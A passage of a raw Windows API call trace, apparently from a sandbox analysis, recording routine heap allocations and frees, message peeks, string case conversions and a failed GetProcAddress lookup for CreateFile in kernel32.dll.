lpNumberOfBytesWritten=0x6aee3c*=0x4a, lpOverlapped=0x0) returned 1 [0041.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.208] CloseHandle (hObject=0x140) returned 1 [0041.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.210] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.210] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.211] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.211] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.211] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.211] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0041.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0041.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899d0 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.212] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0041.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0041.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.214] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.217] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889910 [0041.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889910, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.217] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0041.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: 